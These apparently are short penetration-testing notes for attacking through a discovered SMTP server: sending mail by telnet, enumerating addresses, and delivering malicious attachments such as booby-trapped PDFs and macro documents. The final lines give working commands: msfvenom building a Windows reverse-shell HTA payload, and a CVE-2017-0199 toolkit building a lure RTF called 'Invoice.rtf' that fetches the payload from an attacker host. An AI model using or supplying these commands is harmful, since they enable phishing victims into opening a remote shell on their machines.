SMTP Server Found
Basic telnet send mail
Enumerate Emails
Send Email With attachment
Attachments can be malicious in many ways.
Add a canary image to ping back to you to in a word document
Embed malicious code in pdfs ex. evilpdf
Macros are hard to pop these days but you could add macros to a document.
generate rtf payload https://github.com/bhdresh/CVE-2017-0199
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.91 LPORT=9001 EXITFUNC=thread -f hta-psh -o htapsh.hta
python2 cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://10.10.14.91:8000/htapsh.hta